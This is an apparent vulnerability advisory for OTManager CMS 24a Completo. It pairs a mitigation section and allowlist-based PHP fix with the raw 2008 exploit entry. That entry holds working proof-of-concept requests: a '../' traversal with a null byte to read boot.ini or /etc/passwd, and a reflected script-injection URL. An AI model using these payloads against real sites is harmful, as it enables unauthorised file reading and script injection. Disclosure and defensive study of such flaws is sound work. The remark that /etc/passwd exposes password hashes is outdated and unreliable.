vendor: OTManager CMS
by: CWH Underground
CVSS: 7.5 (HIGH)
LFI/XSS
CWE: 79
Product Name: OTManager CMS
Affected Version From: 24a Completo
Affected Version To: 24a Completo
Patch Exists: YES
Related CWE: N/A
CPE: a:otmanager:otmanager_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2008

OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities

OTManager CMS version 24a Completo is affected by Local File Inclusion (LFI) and Cross-Site Scripting (XSS) vulnerabilities. The application does not properly sanitize user-supplied input to the 'conteudo' parameter of the 'index.php' script: the value has ".php" appended and is passed to file_exists() and require() without validation. An attacker can exploit this by sending a crafted HTTP request to the vulnerable application, which can allow the attacker to execute arbitrary code on the server, steal sensitive information, or perform other malicious actions.

Mitigation:

Validate the 'conteudo' parameter so that untrusted data cannot be used to access local files or execute arbitrary code. Additionally, the application should be updated to the latest version.
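
One way to apply that input validation to the include logic at lines 76-84 of index.php, quoted in the advisory below. This is an added example, not OTManager's code or the vendor's patch; the page names other than Principal, the helper names resolve_page() and h(), and the $pageTitle variable are assumptions.

```php
<?php
// Added example, not OTManager's code. Page names are hypothetical, apart
// from Principal, which the advisory's snippet uses as the default page.
const ALLOWED_PAGES = ['Principal', 'Noticias', 'Contato'];

/**
 * Map the untrusted 'conteudo' value to a file that is safe to require.
 * Returns null when the value is not on the allowlist.
 */
function resolve_page($raw, string $baseDir): ?string
{
    if (!is_string($raw) || $raw === '') {
        return $baseDir . '/Principal.php';   // same default as the original
    }
    // Strict comparison against fixed names: "../" sequences, NUL bytes,
    // absolute paths and stream wrappers can never match an entry.
    if (!in_array($raw, ALLOWED_PAGES, true)) {
        return null;
    }
    $path = realpath($baseDir . '/' . $raw . '.php');
    // Defence in depth: the resolved file must sit directly in $baseDir.
    if ($path === false || dirname($path) !== realpath($baseDir)) {
        return null;
    }
    return $path;
}

/** Encode a value before writing it into HTML (title, body, attributes). */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read from $_GET only; $_REQUEST also merges POST and, depending on
// request_order, cookie data.
$page = resolve_page($_GET['conteudo'] ?? '', __DIR__);
if ($page === null) {
    http_response_code(404);
    // Fixed message: the rejected value is never echoed back.
    echo '<center><b>404 URL Invalida</b></center>';
} else {
    // Assumption: the template prints the page name (the PoC's "</title>"
    // prefix suggests a reflection in the title), so hand it the encoded form.
    $pageTitle = h(basename($page, '.php'));
    require $page;
}
```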

Exploit-DB raw data:

===========================================================
  OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 June 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : OTManager CMS
 VERSION     : 24a Completo
 VENDOR      : http://www.otmanager.org/
 DOWNLOAD    : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip
#####################################################

---------------------------------------
 Vulnerable File [index.php?conteudo=]
---------------------------------------

@Line

   76:  if($_REQUEST['conteudo']==""){
   77:  require("Principal.php");
   78:  }else{
   79:  if(!file_exists($_REQUEST['conteudo'].".php")){
   80:  echo '<center><font size="3"><b>404 URL Invalida</b></font><br><br>Por Favor, Selecione o Conteudo no Menu ao Lado.</center>';
   81:  }else{
   82:       require($_REQUEST['conteudo'].".php");
   83:       }
   84:  }


---------
 Exploit
---------

#####
 LFI
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI]

   
    This exploit opens the boot.ini system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 on a Linux OS to view password hashes.

#####
 XSS
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS]


-------------
 POC Exploit
-------------

#####
 LFI
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00

#####
 XSS
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=</title><script>alert('XSS test');</script>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-27]